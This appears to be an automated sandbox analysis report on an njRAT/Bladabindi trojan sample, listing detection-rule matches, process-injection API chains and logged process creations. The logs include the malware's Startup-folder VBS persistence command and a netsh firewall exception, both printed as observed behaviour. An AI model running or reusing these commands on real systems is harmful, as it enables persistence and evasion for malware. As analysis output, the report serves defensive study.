        Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: WindowsServices.exe.4.dr, caspol.csSecurity API names: mutex.SetAccessControl
        Source: WindowsServices.exe.4.dr, caspol.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: WindowsServices.exe.4.dr, caspol.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: WindowsServices.exe.4.dr, caspol.csSecurity API names: accessControl.AddAccessRule
        Source: WindowsServices.exe.4.dr, caspol.csSecurity API names: mutex.GetAccessControl
        Source: iR2UtZj5vP.exe.1.dr, caspol.csSecurity API names: mutex.SetAccessControl
        Source: iR2UtZj5vP.exe.1.dr, caspol.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: iR2UtZj5vP.exe.1.dr, caspol.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: iR2UtZj5vP.exe.1.dr, caspol.csSecurity API names: accessControl.AddAccessRule
        Source: iR2UtZj5vP.exe.1.dr, caspol.csSecurity API names: mutex.GetAccessControl
        Source: classification engineClassification label: mal100.phis.troj.adwa.spyw.expl.evad.winEXE@35/9@4/3
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 4_2_00B8A8CA AdjustTokenPrivileges,4_2_00B8A8CA
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 4_2_00B8A893 AdjustTokenPrivileges,4_2_00B8A893
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 17_2_00B3A8CA AdjustTokenPrivileges,17_2_00B3A8CA
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 17_2_00B3A893 AdjustTokenPrivileges,17_2_00B3A893
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 21_2_00D7A8CA AdjustTokenPrivileges,21_2_00D7A8CA
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 21_2_00D7A893 AdjustTokenPrivileges,21_2_00D7A893
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 25_2_00E8A8CA AdjustTokenPrivileges,25_2_00E8A8CA
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 25_2_00E8A893 AdjustTokenPrivileges,25_2_00E8A893
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 1_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,1_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeFile created: C:\Users\user\Desktop\iR2UtZj5vP.exeJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7272:120:WilError_03
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMutant created: \Sessions\1\BaseNamedObjects\bf497657d005804b657fde8dd2d0cb46
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3284:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:736:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeFile created: C:\Users\user\AppData\Local\Temp\WindowsServices.exeJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: iR2UtZj5vP.exeReversingLabs: Detection: 86%
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeFile read: C:\Users\user\Desktop\iR2UtZj5vP.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\iR2UtZj5vP.exe C:\Users\user\Desktop\iR2UtZj5vP.exe
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess created: C:\Users\user\Desktop\iR2UtZj5vP.exe C:\Users\user\Desktop\iR2UtZj5vP.exe
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
        Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"Jump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess created: C:\Users\user\Desktop\iR2UtZj5vP.exe C:\Users\user\Desktop\iR2UtZj5vP.exeJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLEJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
        Source: Binary string: caspol.pdbx source: iR2UtZj5vP.exe, 00000001.00000003.1338882973.0000000000632000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000005.00000003.1426722472.0000000000651000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 0000000E.00000002.1683943094.000000000048D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1746893356.000000000061D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000016.00000002.1869540964.000000000065D000.00000004.00000020.00020000.00000000.sdmp, iR2UtZj5vP.exe.1.dr, WindowsServices.exe.4.dr
